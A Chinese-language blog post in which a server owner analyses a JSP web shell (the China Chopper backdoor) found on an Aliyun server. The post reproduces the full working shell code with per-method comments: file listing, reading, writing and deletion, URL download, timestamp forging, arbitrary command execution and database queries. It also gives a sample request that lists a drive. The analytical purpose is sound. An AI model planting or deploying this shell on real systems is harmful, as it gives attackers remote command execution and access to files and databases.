jsp文件木马代码分析

近来登陆阿里云，竟发现webapps/ROOT/下面多了一个tst.jsp

代码格式化了一下，每个方法都注释了下

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd = "chopper";String EC(String s, String c) throws Exception {return s;}//new String(s.getBytes("ISO-8859-1"),c);}//依照给定的参数s连接数据库//以回车符\r\n作为分割//第一行是数据库驱动类名//第二行是jdbc的url//第三行(如果有的话)指定了具体的数据库名Connection GC(String s) throws Exception {String[] x = s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();Connection c = DriverManager.getConnection(x[1].trim());if (x.length > 2) {c.setCatalog(x[2].trim());}return c;}//得到系统中所有根目录下 的每一个文件的名字的前两个字母，写入StringBuffervoid AA(StringBuffer sb) throws Exception {File r[] = File.listRoots();for (int i = 0; i < r.length; i++) {sb.append(r[i].toString().substring(0, 2));}}//得到指定路径下所有文件的 文件名、最后一次修改时间、文件大小、是否可读可写属性，写入StringBuffervoid BB(String s, StringBuffer sb) throws Exception {File oF = new File(s), l[] = oF.listFiles();String sT, sQ, sF = "";java.util.Date dt;SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for (int i = 0; i < l.length; i++) {dt = new java.util.Date(l[i].lastModified());sT = fm.format(dt);sQ = l[i].canRead() ? "R" : "";sQ += l[i].canWrite() ? " W" : "";if (l[i].isDirectory()) {sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");} else {sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";}}sb.append(sF);}//迭代删除给定路径下的所有文件和文件夹void EE(String s) throws Exception {File f = new File(s);if (f.isDirectory()) {File x[] = f.listFiles();for (int k = 0; k < x.length; k++) {if (!x[k].delete()) {EE(x[k].getPath());}}}f.delete();}//将指定路径的文件以流的形式写到response里面void FF(String s, HttpServletResponse r) throws Exception {int n;byte[] b = new byte[512];r.reset();ServletOutputStream os = r.getOutputStream();BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));os.write(("->" + "|").getBytes(), 0, 3);while ((n = is.read(b, 0, 512)) != -1) {os.write(b, 0, n);}os.write(("|" + "<-").getBytes(), 0, 3);os.close();is.close();}//这个方法有啥用啊？没看懂void GG(String s, String d) throws Exception {String h = "0123456789ABCDEF";int n;File f = new File(s);f.createNewFile();FileOutputStream os = new FileOutputStream(f);for (int i = 0; i < d.length(); i += 2) {os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));}os.close();}//将s指定的文件的内容写到d指定的文件里面。如果s指定的是一个文件夹，那么就将s目录下的所有文件拷贝到d目录下void HH(String s, String d) throws Exception {File sf = new File(s), df = new File(d);if (sf.isDirectory()) {if (!df.exists()) {df.mkdir();}File z[] = sf.listFiles();for (int j = 0; j < z.length; j++) {HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());}} else {FileInputStream is = new FileInputStream(sf);FileOutputStream os = new FileOutputStream(df);int n;byte[] b = new byte[512];while ((n = is.read(b, 0, 512)) != -1) {os.write(b, 0, n);}is.close();os.close();}}//更改文件名void II(String s, String d) throws Exception {File sf = new File(s), df = new File(d);sf.renameTo(df);}//创建目录void JJ(String s) throws Exception {File f = new File(s);f.mkdir();}//修改文件的最后修改时间这个属性void KK(String s, String t) throws Exception {File f = new File(s);SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt = fm.parse(t);f.setLastModified(dt.getTime());}//s参数为url,将url的内容写入d参数指定的文件中void LL(String s, String d) throws Exception {URL u = new URL(s);int n;FileOutputStream os = new FileOutputStream(d);HttpURLConnection h = (HttpURLConnection) u.openConnection();InputStream is = h.getInputStream();byte[] b = new byte[512];while ((n = is.read(b, 0, 512)) != -1) {os.write(b, 0, n);}os.close();is.close();h.disconnect();}//将流一行一行写入StringBuffervoid MM(InputStream is, StringBuffer sb) throws Exception {String l;BufferedReader br = new BufferedReader(new InputStreamReader(is));while ((l = br.readLine()) != null) {sb.append(l + "\r\n");}}//得到所有的数据库的名称，写入StringBuffervoid NN(String s, StringBuffer sb) throws Exception {Connection c = GC(s);ResultSet r = c.getMetaData().getCatalogs();while (r.next()) {sb.append(r.getString(1) + "\t");}r.close();c.close();}//获取数据库所有的表，写入StringBuffervoid OO(String s, StringBuffer sb) throws Exception {Connection c = GC(s);String[] t = { "TABLE" };ResultSet r = c.getMetaData().getTables(null, null, "%", t);while (r.next()) {sb.append(r.getString("TABLE_NAME") + "\t");}r.close();c.close();}//s的前三行参数同GC()方法，第四行为表名，得到该表的每一列的列名和类型，写入StringBuffervoid PP(String s, StringBuffer sb) throws Exception {String[] x = s.trim().split("\r\n");Connection c = GC(s);Statement m = c.createStatement(1005, 1007);ResultSet r = m.executeQuery("select * from " + x[3]);ResultSetMetaData d = r.getMetaData();for (int i = 1; i <= d.getColumnCount(); i++) {sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");}r.close();m.close();c.close();}//q为查询的sql语句，将查询的结果写入StringBuffervoid QQ(String cs, String s, String q, StringBuffer sb) throws Exception {int i;Connection c = GC(s);Statement m = c.createStatement(1005, 1008);try {ResultSet r = m.executeQuery(q);ResultSetMetaData d = r.getMetaData();int n = d.getColumnCount();for (i = 1; i <= n; i++) {sb.append(d.getColumnName(i) + "\t|\t");}sb.append("\r\n");while (r.next()) {for (i = 1; i <= n; i++) {sb.append(EC(r.getString(i), cs) + "\t|\t");}sb.append("\r\n");}r.close();} catch (Exception e) {sb.append("Result\t|\t\r\n");try {m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");} catch (Exception ee) {sb.append(ee.toString() + "\t|\t\r\n");}}m.close();c.close();}%><%//以下为访问URL时带的参数//z0：编码//chopper：可以理解为功能选项,看看下面的代码就知道了//z1：普通参数//z2：普通参数String cs = request.getParameter("z0") + "";request.setCharacterEncoding(cs);response.setContentType("text/html;charset=" + cs);String Z = EC(request.getParameter(Pwd) + "", cs);String z1 = EC(request.getParameter("z1") + "", cs);String z2 = EC(request.getParameter("z2") + "", cs);StringBuffer sb = new StringBuffer("");try {sb.append("->" + "|");if (Z.equals("A")) {String s = new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s + "\t");if (!s.substring(0, 1).equals("/")) {AA(sb);}} else if (Z.equals("B")) {BB(z1, sb);} else if (Z.equals("C")) {String l = "";BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while ((l = br.readLine()) != null) {sb.append(l + "\r\n");}br.close();} else if (Z.equals("D")) {BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");} else if (Z.equals("E")) {EE(z1);sb.append("1");} else if (Z.equals("F")) {FF(z1, response);} else if (Z.equals("G")) {GG(z1, z2);sb.append("1");} else if (Z.equals("H")) {HH(z1, z2);sb.append("1");} else if (Z.equals("I")) {II(z1, z2);sb.append("1");} else if (Z.equals("J")) {JJ(z1);sb.append("1");} else if (Z.equals("K")) {KK(z1, z2);sb.append("1");} else if (Z.equals("L")) {LL(z1, z2);sb.append("1");} else if (Z.equals("M")) {String[] c = { z1.substring(2), z1.substring(0, 2), z2 };Process p = Runtime.getRuntime().exec(c);MM(p.getInputStream(), sb);MM(p.getErrorStream(), sb);} else if (Z.equals("N")) {NN(z1, sb);} else if (Z.equals("O")) {OO(z1, sb);} else if (Z.equals("P")) {PP(z1, sb);} else if (Z.equals("Q")) {QQ(cs, z1, z2, sb);}} catch (Exception e) {sb.append("ERROR" + ":// " + e.toString());}sb.append("|" + "<-");out.print(sb.toString());%>

可以看到危害是相当大的

随便尝试一下

访问我的地址：http://我的阿里云IP/tst.jsp?z0=utf-8&chopper=B&z1=C:\

结果列出了C盘目录下所有文件的属性信息

结果如图

那么问题来了，他是怎么把文件上传到我的project里面的呢？